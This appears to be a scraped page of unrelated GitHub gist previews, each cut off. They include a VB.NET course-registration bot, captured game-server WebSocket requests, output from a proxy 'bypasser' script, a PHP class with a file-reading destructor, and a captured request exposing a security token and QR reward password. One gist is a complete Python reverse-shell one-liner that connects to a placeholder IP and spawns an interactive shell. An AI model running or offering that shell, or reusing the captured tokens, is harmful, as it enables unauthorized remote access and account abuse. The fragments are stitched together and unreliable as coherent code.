This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Public Class Form1 | |
Dim basla = 0 | |
Private Sub Button1_Click(sender As Object, e As EventArgs) Handles Button1.Click 'baslat butonu | |
basla = 1 | |
WebBrowser1.Navigate("https://register.metu.edu.tr") | |
Timer2.Start() | |
End Sub | |
Public Sub verigir() | |
If InStr(1, WebBrowser1.Document.Body.OuterText, "CENG") = 0 Then |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
GET /ws/device/295012UDj75F?deviceOS=WEBGL&deviceID=b5a8d8e1-0864-4898-8faf-94c8d2b379ef&SDK=Unity HTTP/1.1 | |
Host: gsp-aeu001-se45.gamesparks.net | |
Connection: Upgrade | |
Pragma: no-cache | |
Cache-Control: no-cache | |
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36 | |
Upgrade: websocket | |
Origin: https://www.catanuniverse.com | |
Sec-WebSocket-Version: 13 | |
Accept-Encoding: gzip, deflate, br |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
GET /ws/device/295012UDj75F?deviceOS=WEBGL&deviceID=1129aef2-cac5-4066-8d0c-b72f5687573a&SDK=Unity HTTP/1.1 | |
Host: gsp-aeu001-se02.gamesparks.net | |
Connection: Upgrade | |
Pragma: no-cache | |
Cache-Control: no-cache | |
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36 | |
Upgrade: websocket | |
Origin: https://catanuniverse.com | |
Sec-WebSocket-Version: 13 | |
Accept-Encoding: gzip, deflate, br |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html><head><title>h311</title></head><body style="background:#000000"><div style="background:#000000; letter-spacing:3px;"> | |
<pre><span> </span><span style="color:ffffff">..</span><span style="color:00ffff">.</span><span style="color:ffffff">..:::ooo::ooo:ooooooooooooooooooooooooOOooooooOoOOOOOOO8888888888888888OOO888888888888888#####################88</span> | |
<span> </span><span style="color:00ffff">.</span><span style="color:ffffff">..:::oooooooooooooooOOOOOOOOOOOO88888888888888O888888888888888################################################8</span> | |
<span> </span><span style="color:ffffff">.:OOOOOOOOOOOOOOOOOOOOOOOO88888888888########################################################################8</span> | |
<span> </span><span style="color:00ffff">.</span><span style="color:ffffff">.:OOOOOOOO8888888############################################################################## |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/home/rkv/Documents/bypasser/venv/bin/python /home/rkv/Documents/bypasser/bb.py | |
80.211.210.39 8080 | |
(b'HTTP/1.1 200 OK\r\nDate: Fri, 10 Apr 2020 07:37:32 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nTransfer-Encoding: chunked\r\nSet-Cookie: __cfduid=d273cadc2b998c6c730f907ea1de80f9c1586504252; expires=Sun, 10-May-20 07:37:32 GMT; path=/; domain=.zarar.win; HttpOnly; SameSite=Lax; Secure\r\nX-Powered-By: PHP/5.6.40\r\nVary: Accept-Encoding\r\nAccess-Control-Allow-Origin: *\r\nAccess-Control-Allow-Headers: Content-Type, Authorization, access-control-allow-origin, x-requested-with\r\nAccess-Control-Allow-Methods: GET,PUT,POST,DELETE\r\nCF-Cache-Status: DYNAMIC\r\nExpect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"\r\nStrict-Transport-Security: max-age=0; includeSubDomains; preload\r\nX-Content-Type-Options: nosniff\r\nServer: cloudflare\r\nCF-RAY: 581acd9a6d5ffd11-OTP\r\nContent-Encoding: gzip\r\nConnection: keep-alive\r\n\r\n', None) | |
94.130.70.42 80 | |
(b'HTTP/1.1 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
LDFLAGS=-std=c++11 | |
MAKER=make --no-print-directory | |
DIFFER=diff -y --color --minimal --suppress-common-lines | |
define check_class | |
@$(MAKER) clean; | |
@echo "compiling $(1)"; | |
@if $(MAKER) $(1); then \ | |
echo "$(1) compiled successfully.\nchecking outputs"; \ | |
else\ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
class Dosya { | |
public $files = ""; | |
function __destruct() { | |
$dosya = explode(".",strtolower($this->files)); | |
if(end($dosya) === "txt"){ | |
$ac = file($this->files); | |
if($ac[0] === trim("istekler")){ | |
}else { | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
class Dosya { | |
public $files = ""; | |
function __destruct() { | |
$dosya = explode(".",strtolower($this->files)); | |
if(end($dosya) === "txt"){ | |
$ac = file($this->files); | |
if($ac[0] === trim("istekler")){ | |
}else { | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP_ADDRESS",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
POST /restearnmobil/odul_qr_read HTTP/1.1 | |
Content-Length: 255 | |
Content-Type: application/x-www-form-urlencoded | |
Host: restearncloud.com | |
Connection: Keep-Alive | |
Accept-Encoding: gzip | |
req=%7B%22security_token%22%3A%22caXNnBzGd64wMX9jg2L9%22%2C%22qr_code%22%3A%22KG7QVfRp2020062622004922527%22%2C%22qr_sifre%22%3A%22said1234said%22%2C%22qr_pass%22%3A%22uPT3M1hY2020062622004922527%22%2C%22tip%22%3A%22odul%22%2C%22kul_id%22%3A%2212040%22%7D |
OlderNewer